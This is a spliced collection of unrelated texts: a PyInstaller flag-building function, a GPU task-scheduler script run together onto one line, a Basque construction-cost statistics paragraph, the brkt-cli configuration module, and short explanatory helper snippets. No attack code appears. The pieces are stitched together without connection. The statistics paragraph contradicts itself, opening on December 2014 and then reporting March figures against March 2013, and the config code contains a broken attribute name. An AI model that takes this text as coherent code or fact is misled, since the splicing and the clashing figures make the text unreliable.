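def build_flags(config, fname, distpath_supported=True):
    """Assemble a PyInstaller-style argument vector from a config mapping."""
    flags = [sys.executable,
             os.path.join(config['pyidir'], config['pyscript'])]
    switches = [            # (config key, CLI switch)
        ('noconfirm', '--noconfirm'),
        ('singlefile', '--onefile'),
        ('ascii', '--ascii'),
        ('windowed', '--noconsole'),
    ]
    for key, switch in switches:
        if config.get(key):
            flags.append(switch)
    if config.get('upxdir'):
        flags.append('--upx-dir=' + config['upxdir'])
    # PyInstaller 2.1 renamed --out to --distpath.
    out_flag = '--distpath=' if distpath_supported else '--out='
    flags.append(out_flag + os.path.dirname(fname))
    flags.append(fname)
    return flags
```

Keeping the key-to-switch mapping in a list of pairs makes adding a new option a one-line change instead of another if-block.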
#!/usr/bin/env python3 import argparse import json import time import subprocess import fcntl import errno import datetime import os import sys import signal import threading import shlex # CONSTANTS - Scheduler settings SEC_DELAY = 3 PATH = "/tmp/" GPU_INFO_FILE = os.path.join(PATH, "gpu_scheduler_info") DEFAULT_GPU_COUNT = 4 KILL_DELAY_SEC = 3 # CONSTANTS - Data keys GPU_AVAIL = 'avail' GPU_USER = 'user' GPU_TASK = 'task' GPU_TASK_PID = 'task_pid' GPU_TASK_START = 'task_start' GPU_NAME = 'gpu_name' # CONSTANTS KILL = 0 TERMINATE = 1 WARN = 2 # GLOBAL VARIABLES TASK_SIGNAL = WARN def get_args(): parser = argparse.ArgumentParser() parser.add_argument("-gc", "--gpu_count", type=int, default=1, help="The count of required GPUs for specified task.") parser.add_argument("-i", "--init", nargs="+", type=int, help="""Initializes gpu info file. List of numbers is expected, where first number is total count of GPUs and the rest of the numbers denotes unavailable GPUs. e.g -i 5 3 4 means that total count of GPUs is 5 and GPU 3 and 4 are currently unavailable.""") parser.add_argument("-v", "--verbose", action="store_true", help="Prints info about the process, when the task is completed.") parser.add_argument("-o", "--out", nargs="?", type=argparse.FileType('w'), default=sys.stdout, help="The name of the file, which will be used to store stdout. The default file is sys.stdout.") parser.add_argument("-e", "--err", nargs="?", type=argparse.FileType('w'), default=sys.stderr, help="The name of the file, which will be used to store stderr. 
The default file is sys.stderr.") parser.add_argument("-pg", "--prefered_gpu", type=int, help="If possible, prefered GPU is assigned to the task, otherwise is assigned random free GPU.") parser.add_argument("-fg", "--forced_gpu", type=int, help="Wait until specified GPU is free.") parser.add_argument("-s", "--status", action='store_true', help="Show info about GPU usage - user/GPU/taskPID/start") parser.add_argument("-rg", "--release_gpu", type=int, nargs='+', help="Releases GPUs according their indices. e.g -rg 0 2 will release GPU 0 and 2.") parser.add_argument("task", nargs='?', help="The quoted task with arguments which will be started on free GPUs as soon as possible.") return parser.parse_args() # main function def run_task(gpu_info_file, args): is_waiting = False while True: try: lock_file(gpu_info_file) free_gpu = get_free_gpu(gpu_info_file) if len(free_gpu) >= args.gpu_count: try: if args.prefered_gpu is not None: free_gpu = get_prefered_gpu(free_gpu, args.prefered_gpu) if args.forced_gpu is not None: free_gpu = get_prefered_gpu(free_gpu, args.forced_gpu) forced_gpu_free = check_forced_free(free_gpu, args.forced_gpu) if not forced_gpu_free: if not is_waiting: is_waiting = True print("Scheduler (PID: {}) is waiting for GPU {}.".format(os.getpid(), args.forced_gpu)) continue # select required count of free gpu, which will be passed to the task free_gpu = free_gpu[0:args.gpu_count] # lock used gpu set_occupied_gpu(gpu_info_file, free_gpu) unlock_file(gpu_info_file) # set enviromental variable GPU to cuda[index of allocated GPU] cuda = set_env_vars(free_gpu) dt_before = datetime.datetime.now() # parse string of args to list task = prepare_args(args.task) # replace char '#' with port number task = insert_portshift(task, free_gpu[0]) # run required task p = subprocess.Popen(task, stdout=args.out, stderr=args.err, preexec_fn=before_new_subprocess) # The second Ctrl-C kill the subprocess signal.signal(signal.SIGINT, lambda signum, frame: stop_subprocess(p, 
gpu_info_file, free_gpu)) set_additional_info(gpu_info_file, free_gpu, os.getlogin(), task, p.pid, get_formated_dt(dt_before), cuda) print("GPU: {}\nSCH PID: {}\nTASK PID: {}".format(cuda, os.getpid(), p.pid)) print("SCH PGID: {}\nTASK PGID: {}".format(os.getpgid(os.getpid()), os.getpgid(p.pid))) p.wait() dt_after = datetime.datetime.now() # info message if args.verbose: print("\ntask: {}\nstdout: {}\nstderr: {}\nstart: {}\nend: {}\ntotal time: {}\n".format( task, args.out.name, args.err.name, get_formated_dt(dt_before), get_formated_dt(dt_after), get_time_duration(dt_before, dt_after))) break # make sure the GPU is released even on interrupts finally: set_free_gpu(gpu_info_file, free_gpu) unlock_file(gpu_info_file) time.sleep(1) else: unlock_file(gpu_info_file) time.sleep(SEC_DELAY) except IOError as e: handle_io_error(e) def before_new_subprocess(): signal.signal(signal.SIGINT, signal.SIG_IGN) os.setsid() def prepare_args(args): result = [] for a in args.split('\n'): if a != '': result.extend(shlex.split(a)) return result def stop_subprocess(process, gpu_file, gpu_to_release): """ This function take care of the Ctrl-C (SIGINT) signal. On the first Ctrl-C the warning is printed. On the second Ctrl-C the task is terminated. On the third Ctrl-C the task is killed. Delay between terminate and kill is specified in KILL_DELAY_SEC. 
""" def allow_kill_task(): global TASK_SIGNAL TASK_SIGNAL = KILL def check_process_liveness(process, max_time): if max_time <= 0 or (process.poll() is not None): allow_kill_task() else: threading.Timer(0.1, lambda: check_process_liveness(process, max_time - 0.1)).start() global TASK_SIGNAL if TASK_SIGNAL is KILL: pgid = os.getpgid(process.pid) print("\nThe task (PGID: {}) was killed.".format(pgid)) set_free_gpu(gpu_file, gpu_to_release) os.killpg(pgid, signal.SIGKILL) TASK_SIGNAL = None elif TASK_SIGNAL is TERMINATE: pgid = os.getpgid(process.pid) print("\nThe task (PGID: {}) was terminated.".format(pgid)) set_free_gpu(gpu_file, gpu_to_release) os.killpg(pgid, signal.SIGTERM) # send a second SIGTERM because of blocks os.killpg(pgid, signal.SIGTERM) check_process_liveness(process, KILL_DELAY_SEC) TASK_SIGNAL = None elif TASK_SIGNAL is WARN: pgid = os.getpgid(process.pid) print("\nNext Ctrl-C terminate the task (PGID: {}).".format(pgid)) TASK_SIGNAL = TERMINATE def check_forced_free(gpu_indices, forced): if gpu_indices: return gpu_indices[0] == forced return False def get_prefered_gpu(gpu_indices, prefered): """Move prefered GPU on a first position if it is available.""" if prefered in gpu_indices: gpu_indices.remove(prefered) return [prefered, ] + gpu_indices return gpu_indices def insert_portshift(task, task_id): port = 3600 + task_id * 100 task = list(map(lambda v: str(port) if v == '__num__' else v, task)) return task # decorators def access_gpu_file(func): def wrapper(f, *args, **kwargs): while True: try: lock_file(f) func(f, *args, **kwargs) unlock_file(f) break except IOError as e: handle_io_error(e) return wrapper def seek_to_start(func): def wrapper(f, *args, **kwargs): f.seek(0) result = func(f, *args, **kwargs) f.seek(0) return result return wrapper @access_gpu_file @seek_to_start def init_gpu_info_file(f, gpu_count, occupied_gpu): """ occupied_gpu - indices of GPUs which currently are not available gpu_count - total count of GPUs on a system """ 
gpu_states = [False if i in occupied_gpu else True for i in range(gpu_count)] f.truncate() data = {} data[GPU_AVAIL] = gpu_states init_to_none = lambda c: c * [None] data[GPU_USER] = init_to_none(gpu_count) data[GPU_TASK] = init_to_none(gpu_count) data[GPU_TASK_PID] = init_to_none(gpu_count) data[GPU_TASK_START] = init_to_none(gpu_count) data[GPU_NAME] = init_to_none(gpu_count) json.dump(data, f, indent=4, sort_keys=True) @seek_to_start def get_free_gpu(gpu_info_file): "Returns list of GPU indices which are available." gpu_states = json.load(gpu_info_file)[GPU_AVAIL] return [i for i, avail in enumerate(gpu_states) if avail] @seek_to_start def update_gpu_info(f, release_gpu, indices, user=None, task=None, proc_pid=None, start=None, gpu_name=None): gpu_data = json.load(f) f.seek(0) f.truncate() for i in range(len(gpu_data[GPU_AVAIL])): if i in indices: gpu_data[GPU_AVAIL][i] = release_gpu gpu_data[GPU_USER][i] = user gpu_data[GPU_TASK][i] = task gpu_data[GPU_TASK_PID][i] = proc_pid gpu_data[GPU_TASK_START][i] = start gpu_data[GPU_NAME][i] = gpu_name json.dump(gpu_data, f, indent=4, sort_keys=True) @access_gpu_file def set_additional_info(f, gpu_indices, user, task, proc_pid, start, gpu_name): update_gpu_info(f, False, gpu_indices, user, task, proc_pid, start, gpu_name) def set_occupied_gpu(f, occupied_gpu): """Locks currently unavailable GPUs.""" update_gpu_info(f, False, occupied_gpu) @access_gpu_file def set_free_gpu(f, free_gpu): """Releases GPUs""" update_gpu_info(f, True, free_gpu) def get_formated_dt(dt): """Returns the datetime object formated.""" return dt.strftime("%Y-%m-%d %H:%M:%S") def get_time_duration(before, after): """Returns the difference between two datetime objects in format: hours:minutes:seconds""" total_seconds = (after - before).seconds mins, secs = divmod(total_seconds, 60) hours, mins = divmod(mins, 60) return "{}:{}:{}".format(hours, mins, secs) def lock_file(f): """Locks the file.""" fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB) def 
unlock_file(f): """Unlocks the file.""" fcntl.flock(f, fcntl.LOCK_UN) def handle_io_error(e): if e.errno != errno.EAGAIN: raise e time.sleep(0.1) def set_env_vars(gpu_indices): """Sets enviromental variable GPU""" # currently is cupported just one gpu on task cuda = "cuda{}".format(gpu_indices[0]) os.environ['GPU'] = cuda return cuda def validate_args(args): if args.gpu_count != 1: print("Usage of multiple GPUs isn't supported yet. You must use just the one GPU for the task.") sys.exit(1) @seek_to_start def display_status(f): gpu_data = json.load(f) occupied = [i for i, avail in enumerate(gpu_data[GPU_AVAIL]) if not avail] free = [i for i, avail in enumerate(gpu_data[GPU_AVAIL]) if avail] if occupied: print("Currently used GPU:") print("-------------------") for i in occupied: print("GPU: {}\nUser: {}\nTask: {}\nTask PID: {}\nStarted: {}\n".format(gpu_data[GPU_NAME][i], gpu_data[GPU_USER][i], gpu_data[GPU_TASK][i], gpu_data[GPU_TASK_PID][i], gpu_data[GPU_TASK_START][i])) if free: print("Free GPU:") print("---------") for i in free: print("GPU {}".format(i)) else: print("No GPU available.") # run scheduler if __name__ == '__main__': mode = 'r+' need_init_gpuf = not(os.path.isfile(GPU_INFO_FILE)) if need_init_gpuf: mode = 'w+' with open(GPU_INFO_FILE, mode) as f: if need_init_gpuf: os.fchmod(f.fileno(), 0o777) init_gpu_info_file(f, DEFAULT_GPU_COUNT, []) # parse cli args args = get_args() validate_args(args) if args.init: init_gpu_info_file(f, args.init[0], args.init[1:]) if args.release_gpu: set_free_gpu(f, args.release_gpu) if args.status: display_status(f) if args.task: run_task(f, args)
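The access_gpu_file decorator above serializes all readers and writers of the GPU info file with a non-blocking flock plus a retry loop. The core of that pattern, extracted into a standalone helper (the names are illustrative):

```python
import errno
import fcntl
import time


def with_locked_file(f, func, delay=0.1):
    """Run ``func(f)`` while holding an exclusive advisory lock on ``f``.

    LOCK_NB makes flock fail fast with EAGAIN instead of blocking, so the
    caller can sleep briefly and retry, as the scheduler above does.
    """
    while True:
        try:
            fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
        except OSError as exc:
            if exc.errno not in (errno.EAGAIN, errno.EACCES):
                raise
            time.sleep(delay)
            continue
        try:
            return func(f)
        finally:
            fcntl.flock(f, fcntl.LOCK_UN)
```

Note that flock provides advisory locking only: every cooperating process must go through the same protocol, which is exactly why the scheduler funnels all file access through one decorator.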
There was a 0.2% rise in the Construction Costs Index in the Basque Country in December 2014 compared to the previous month, whilst the year-on-year rate for the same month fell by 0.6%, according to data provided by EUSTAT. In March, the sub-sectors of Building and Civil Works showed a similar evolution in the cost of their raw materials in relation to the previous month: the cost of raw materials consumed rose by 0.2% in Building and by 0.1% in Civil Works. Year-on-year, both sub-sectors recorded falls: Building raw material costs fell by 1.2%, whereas those for Civil Works recorded a 2.2% decrease. The raw materials that recorded the biggest year-on-year price increases (March 2014 on March 2013) were those of the Timber Industry and Electricity & Gas sectors, which both rose by 1.2%. On the other hand, the sectors with the biggest raw-material price reductions over the last twelve months were Oil Refining, which fell by 6.8%, Metallurgy, which was down 4.6%, and Electrical Equipment, which was down by 2.4%.
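The month-on-month and year-on-year rates quoted above are both simple percentage changes of the index level against a reference period. For illustration (the index levels below are invented, not EUSTAT figures):

```python
def pct_change(current, reference):
    """Percentage change of an index level against a reference level."""
    return (current - reference) / reference * 100.0


# Hypothetical index levels for one month, the month before it, and the
# same month a year earlier:
month_on_month = pct_change(102.2, 102.0)  # small monthly rise
year_on_year = pct_change(102.2, 102.8)    # annual fall
```

The same index series yields both rates; only the reference period changes.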
# Copyright 2017 Bracket Computing, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # https://github.com/brkt/brkt-cli/blob/master/LICENSE # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and # limitations under the License. import argparse import collections import errno import logging import os import os.path import shutil import sys import tempfile import yaml import brkt_cli from brkt_cli import argutil from brkt_cli.subcommand import Subcommand from brkt_cli.util import parse_endpoint, render_table_rows from brkt_cli.validation import ValidationError log = logging.getLogger(__name__) CONFIG_DIR = os.path.expanduser('~/.brkt') CONFIG_PATH = os.path.join(CONFIG_DIR, 'config') VERSION = 3 class InvalidOptionError(Exception): def __init__(self, option): self.option = option class UnknownEnvironmentError(Exception): def __init__(self, env): self.env = env class InvalidEnvironmentError(Exception): def __init__(self, missing_keys): self.missing_keys = missing_keys BRKT_HOSTED_ENV_NAME = 'brkt-hosted' def _bracket_environment_to_dict(benv): """Convert a BracketEnvironment object to a dictionary that can be stored in a config. 
:param benv a BracketEnvironment object :return a dictionary """ return { 'api-host': benv.api_host, 'api-port': benv.api_port, 'keyserver-host': benv.hsmproxy_host, 'keyserver-port': benv.hsmproxy_port, 'public-api-host': benv.public_api_host, 'public-api-port': benv.public_api_port, 'network-host': benv.network_host, 'network-port': benv.network_port, 'public-api-ca-cert-path': benv.public_api_ca_cert_path } def _bracket_environment_from_dict(d): """Convert a bracket environment from the config into a BracketEnvironment object :param d a dictionary :return a BracketEnvironment object """ benv = brkt_cli.BracketEnvironment() benv.api_host = d.get('api-host') benv.api_port = d.get('api-port') benv.hsmproxy_host = d.get('keyserver-host') benv.hsmproxy_port = d.get('keyserver-port') benv.public_api_host = d.get('public-api-host') benv.public_api_port = d.get('public-api-port') benv.network_host = d.get('network-host') benv.network_port = d.get('network-port') benv.public_api_ca_cert_path = d.get('public-api-ca-cert-path') return benv def _validate_environment(benv): """Make sure all the necessary attributes of an environment are set. :raises InvalidEnvironmentError """ attrs = ('api_host', 'hsmproxy_host', 'public_api_host', 'network_host') missing = [] for attr in attrs: if getattr(benv, attr) is None: missing.append(attr) if len(missing) > 0: raise InvalidEnvironmentError(missing) def _unlink_noraise(path): try: os.unlink(path) except OSError as e: if e.errorno == errno.ENOENT: pass else: log.exception("Failed unlinking %s", path) except: log.exception("Failed unlinking %s", path) class CLIConfig(object): """CLIConfig exposes an interface that subcommands can use to retrieve persistent configuration options. 
""" def __init__(self): self._config = { 'current-environment': None, 'environments': {}, 'options': {}, 'version': VERSION, 'internal': {} } self._add_prod_env() self._registered_options = collections.defaultdict(dict) def _get_env(self, env_name): if env_name not in self._config['environments']: raise UnknownEnvironmentError(env_name) d = self._config['environments'][env_name] return _bracket_environment_from_dict(d) def set_env(self, name, env): """Update the named environment. :param name the environment name (e.g. stage) :param env a BracketEnvironment instance """ d = _bracket_environment_to_dict(env) self._config['environments'][name] = d def get_current_env(self): """Return the current environment. :return a tuple of environment name, BracketEnvironment """ env_name = self._config['current-environment'] return env_name, self.get_env(env_name) def set_current_env(self, env_name): """Change the current environment :param env_name the named env """ env = self._get_env(env_name) _validate_environment(env) self._config['current-environment'] = env_name def get_env_meta(self): """Return all defined environments""" meta = {} for env_name in self._config['environments'].iterkeys(): meta[env_name] = { 'is_current': self._config['current-environment'] == env_name } return meta def get_env(self, env_name): """Return the named environment :param env_name a string :return a BracketEnvironment instance :raises UnknownEnvironmentError """ return self._get_env(env_name) def unset_env(self, env_name): """Delete the named environment :param env_name a string :raises UnknownEnvironmentError """ self._get_env(env_name) del self._config['environments'][env_name] if self._config['current-environment'] == env_name: self._config['current-environment'] = BRKT_HOSTED_ENV_NAME def _check_option(self, option): if option not in self._registered_options: raise InvalidOptionError(option) def register_option(self, option, desc): self._registered_options[option] = desc def 
registered_options(self): return self._registered_options def set_option(self, option, value): """Set the value for the supplied option. :param option a dot-delimited option string :param value the option value """ self._check_option(option) levels = option.split('.') attr = levels.pop() cur = self._config['options'] for level in levels: if level not in cur: cur[level] = {} cur = cur[level] cur[attr] = value def get_option(self, option, default=None): """Fetch the value for the supplied option. :param option a dot-delimited option string :param default the value to be returned if option is not present :return the option value """ self._check_option(option) levels = option.split('.') attr = levels.pop() cur = self._config['options'] for level in levels: if level not in cur: return default cur = cur[level] return cur.get(attr, default) def _remove_empty_dicts(self, h): to_remove = [] for k in h: if isinstance(h[k], dict): self._remove_empty_dicts(h[k]) if len(h[k]) == 0: to_remove.append(k) for k in to_remove: del h[k] def unset_option(self, option): """Unset the value for the supplied option. 
:param option A dot-delimited option string """ self._check_option(option) levels = option.split('.') attr = levels.pop() cur = self._config['options'] for level in levels: if level not in cur: return cur = cur[level] if attr in cur: del cur[attr] # Clean up any empty sub-sections self._remove_empty_dicts(self._config['options']) def set_internal_option(self, option, value): self._config['internal'][option] = value def get_internal_option(self, option, default=None): return self._config['internal'].get(option, default) def _migrate_config(self, config): """Handle migrating between different config versions""" if config['version'] == 1: config['environments'] = {} config['current-environment'] = None config['version'] = 2 if config['version'] == 2: config['internal'] = {} config['version'] = VERSION return config def _add_prod_env(self): prod_env = brkt_cli.get_prod_brkt_env() prod_dict = _bracket_environment_to_dict(prod_env) self._config['environments'][BRKT_HOSTED_ENV_NAME] = prod_dict if self._config.get('current-environment') is None: self._config['current-environment'] = BRKT_HOSTED_ENV_NAME def read(self, f=None): """Read the config from disk""" try: if not f: f = open(CONFIG_PATH) config = yaml.safe_load(f) self._config = self._migrate_config(config) self._add_prod_env() except IOError as e: if e.errno != errno.ENOENT: raise finally: if f: f.close() def write(self, f): """Write the config to disk. :param f A file-like object """ yaml.dump(self._config, f) def save_config(self): """Save the current config to disk. 
""" try: os.mkdir(CONFIG_DIR, 0755) except OSError as e: if e.errno != errno.EEXIST: raise f = tempfile.NamedTemporaryFile(delete=False, prefix='brkt_cli') try: self.write(f) f.close() except: _unlink_noraise(f.name) raise try: shutil.move(f.name, CONFIG_PATH) except: _unlink_noraise(f.name) raise class ConfigSubcommand(Subcommand): def __init__(self, stdout=sys.stdout): self.stdout = stdout def name(self): return 'config' def register(self, subparsers, parsed_config): self.parsed_config = parsed_config config_parser = subparsers.add_parser( self.name(), description=( 'Display or update brkt-cli options stored in' ' ~/.brkt/config'), help='Display or update brkt-cli options' ) config_subparsers = config_parser.add_subparsers( dest='config_subcommand', # Hardcode the list, so that we don't expose subcommands that # are still in development. metavar='{list,set,get,unset,set-env,use-env,list-envs,get-env,' 'unset-env}' ) # List all options config_subparsers.add_parser( 'list', help='Display the values of all options set in the config file', description='Display the values of all options set in the config file') # All the options available for retrieval/mutation rows = [] descs = self.parsed_config.registered_options() opts = sorted(descs.keys()) for opt in opts: rows.append([opt, descs[opt]]) opts_table = render_table_rows(rows, row_prefix=' ') epilog = "\n".join([ 'supported options:', '', opts_table ]) # Set an option set_parser = config_subparsers.add_parser( 'set', help='Set the value for an option', description='Set the value for an option', epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter) set_parser.add_argument( 'option', help='The option name (e.g. 
encrypt-gcp-image.project)') set_parser.add_argument( 'value', help='The option value') # Get the value for an option get_parser = config_subparsers.add_parser( 'get', help='Get the value for an option', description='Get the value for an option', epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter) get_parser.add_argument( 'option', help='The option name (e.g. encrypt-gcp-image.project)') # Unset the value for an option unset_parser = config_subparsers.add_parser( 'unset', help='Unset the value for an option', description='Unset the value for an option', epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter) unset_parser.add_argument( 'option', help='The option name (e.g. encrypt-gcp-image.project)') # Define or update an environment set_env_parser = config_subparsers.add_parser( 'set-env', help='Update the attributes of an environment', description=""" Update the attributes of an environment Environments are persisted in your configuration and can be activated via the `use-env` config subcommand. This command is particularly helpful if you need to work with multiple on-prem control-plane deployments. For example, we could define stage and prod control planes hosted at stage.foo.com and prod.foo.com, respectively, by executing: > brkt config set-env stage --service-domain stage.foo.com > brkt config set-env prod --service-domain prod.foo.com We can switch between the environments using the `use-env` config subcommand like so: > brkt config use-env stage We can determine the current environment using the `list-envs` config subcommand: > brkt config list-envs brkt-hosted prod * stage > The leading `*' indicates that the `stage' environment is currently active. """, formatter_class=argparse.RawDescriptionHelpFormatter) set_env_parser.add_argument( 'env_name', help='The environment name (e.g. 
stage)') set_env_parser.add_argument( '--api-server', help='The api server (host[:port]) the metavisor will connect to') set_env_parser.add_argument( '--key-server', help='The key server (host[:port]) the metavisor will connect to') set_env_parser.add_argument( '--network-server', help='The network server (host[:port]) the metavisor will connect to') argutil.add_public_api_ca_cert(set_env_parser) set_env_parser.add_argument( '--public-api-server', help='The public api (host[:port])') set_env_parser.add_argument( '--service-domain', help=('Set server values from the service domain. This option ' 'assumes that each server is resolvable via a hostname ' 'rooted at service-domain. Specifically, api is expected ' 'to live at yetiapi.<service-domain>, key-server at ' 'hsmproxy.<service-domain>, network at ' 'network.<service-domain>, and public-api-server at ' 'api.<service-domain>.') ) # Set the active environment use_env_parser = config_subparsers.add_parser( 'use-env', help='Set the active environment', description='Set the active environment', formatter_class=argparse.ArgumentDefaultsHelpFormatter) use_env_parser.add_argument( 'env_name', help='The environment name (e.g. stage)') # Display all defined environments config_subparsers.add_parser( 'list-envs', help='Display all environments', description=( "Display all environments. 
The leading `*' indicates" " the currently active environment.")) # Get the details of a specific environment get_env_parser = config_subparsers.add_parser( 'get-env', help='Display the details of a specific environment', description='Display the details of an environment', formatter_class=argparse.ArgumentDefaultsHelpFormatter) get_env_parser.add_argument( 'env_name', help='The environment name') # Unset a specific environment unset_env_parser = config_subparsers.add_parser( 'unset-env', help='Delete an environment', description='Delete an environment') unset_env_parser.add_argument( 'env_name', help='The environment name') def _list_options(self): """Display the contents of the config""" for opt in sorted(self.parsed_config.registered_options().keys()): val = self.parsed_config.get_option(opt) if val is not None: line = "%s=%s\n" % (opt, val) self.stdout.write(line) return 0 def _get_option(self, opt): try: val = self.parsed_config.get_option(opt) except InvalidOptionError: raise ValidationError('Error: unknown option "%s".' % (opt,)) if val: self.stdout.write("%s\n" % (val,)) return 0 def _set_option(self, opt, val): """Set the specified option""" try: self.parsed_config.set_option(opt, val) except InvalidOptionError: raise ValidationError('Error: unknown option "%s".' % (opt,)) return 0 def _unset_option(self, opt): """Unset the specified option""" try: self.parsed_config.unset_option(opt) except InvalidOptionError: raise ValidationError('Error: unknown option "%s".' 
% (opt,)) return 0 def _set_env(self, values): """Update attributes for the named environment""" if values.env_name == BRKT_HOSTED_ENV_NAME: raise ValidationError( 'Error: cannot modify environment ' + values.env_name) try: env = self.parsed_config.get_env(values.env_name) except UnknownEnvironmentError: env = brkt_cli.BracketEnvironment() opt_attr = { 'api': 'api', 'key': 'hsmproxy', 'public_api': 'public_api', 'network': 'network', } for k in opt_attr.iterkeys(): endpoint = k + '_server' endpoint = getattr(values, endpoint) if endpoint is None: continue try: host, port = parse_endpoint(endpoint) except ValueError: raise ValidationError('Error: Invalid value for option --' + k + '-server') port = port or 443 setattr(env, opt_attr[k] + '_host', host) setattr(env, opt_attr[k] + '_port', port) if values.service_domain is not None: env = brkt_cli.brkt_env_from_domain(values.service_domain) env.public_api_ca_cert_path = values.public_api_ca_cert self.parsed_config.set_env(values.env_name, env) return 0 def _use_env(self, values): """Set the active environment""" try: self.parsed_config.set_current_env(values.env_name) except UnknownEnvironmentError: raise ValidationError('Error: unknown environment ' + values.env_name) except InvalidEnvironmentError, e: attr_opt = { 'api_host': 'api-server', 'hsmproxy_host': 'key-server', 'public_api_host': 'public-api-server', 'network_host': 'network', } msg = ("Error: the environment %s is missing values for %s." 
" Use `brkt config set-env` to set the appropriate values.") opts = [] for attr in e.missing_keys: opts.append(attr_opt[attr]) raise ValidationError(msg % (values.env_name, ', '.join(opts))) def _list_envs(self): """Display all envs""" meta = self.parsed_config.get_env_meta() rows = [] for env_name in sorted(meta.keys()): marker = ' ' if meta[env_name]['is_current']: marker = '*' rows.append((marker, env_name)) self.stdout.write(render_table_rows(rows) + "\n") def _get_env(self, values): """Display the details of an environment""" try: env = self.parsed_config.get_env(values.env_name) except UnknownEnvironmentError: raise ValidationError('Error: unknown environment ' + values.env_name) attr_opt = { 'api': 'api', 'hsmproxy': 'key', 'public_api': 'public-api', 'network': 'network', } for k in sorted(attr_opt.keys()): host = getattr(env, k + '_host') if host is None: continue port = getattr(env, k + '_port') self.stdout.write("%s-server=%s:%d\n" % (attr_opt[k], host, port)) if env.public_api_ca_cert_path: self.stdout.write( 'public-api-ca-cert=%s\n' % env.public_api_ca_cert_path) def _unset_env(self, values): """Delete the named environment""" if values.env_name == BRKT_HOSTED_ENV_NAME: raise ValidationError( 'Error: cannot delete environment ' + values.env_name) try: self.parsed_config.unset_env(values.env_name) except UnknownEnvironmentError: raise ValidationError('Error: unknown environment ' + values.env_name) def run(self, values): subcommand = values.config_subcommand if subcommand == 'list': self._list_options() elif subcommand == 'set': self._set_option(values.option, values.value) self.parsed_config.save_config() elif subcommand == 'get': self._get_option(values.option) elif subcommand == 'unset': self._unset_option(values.option) self.parsed_config.save_config() elif subcommand == 'set-env': self._set_env(values) self.parsed_config.save_config() elif subcommand == 'use-env': self._use_env(values) self.parsed_config.save_config() elif subcommand == 
'list-envs': self._list_envs() elif subcommand == 'get-env': self._get_env(values) elif subcommand == 'unset-env': self._unset_env(values) self.parsed_config.save_config() return 0 def get_subcommands(): return [ConfigSubcommand()]
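For reference, the dot-delimited option handling in `set_option`, `get_option`, and `unset_option` (including the empty-dict pruning done by `_remove_empty_dicts`) can be exercised on its own. The sketch below is illustrative only and not part of brkt_cli; the function names `set_path`, `get_path`, and `unset_path` are mine, and it is written as plain Python 3 rather than the Python 2 idioms used above:

```python
def set_path(tree, path, value):
    """Store value under a dot-delimited path, creating sub-dicts as needed."""
    levels = path.split('.')
    attr = levels.pop()
    cur = tree
    for level in levels:
        cur = cur.setdefault(level, {})
    cur[attr] = value


def get_path(tree, path, default=None):
    """Fetch the value under a dot-delimited path, or default if absent."""
    levels = path.split('.')
    attr = levels.pop()
    cur = tree
    for level in levels:
        if level not in cur:
            return default
        cur = cur[level]
    return cur.get(attr, default)


def unset_path(tree, path):
    """Delete the value at path, pruning any sub-dicts left empty."""
    levels = path.split('.')
    attr = levels.pop()
    cur = tree
    parents = []
    for level in levels:
        if level not in cur:
            return
        parents.append((cur, level))
        cur = cur[level]
    cur.pop(attr, None)
    # Prune empty sub-dicts from the deepest level upward, mirroring
    # what _remove_empty_dicts does after unset_option.
    for parent, key in reversed(parents):
        if not parent[key]:
            del parent[key]
```

After `set_path(tree, 'encrypt-gcp-image.project', 'demo')` the tree holds `{'encrypt-gcp-image': {'project': 'demo'}}`, and unsetting that path prunes the now-empty `encrypt-gcp-image` sub-dict, matching how the config file avoids accumulating empty sections.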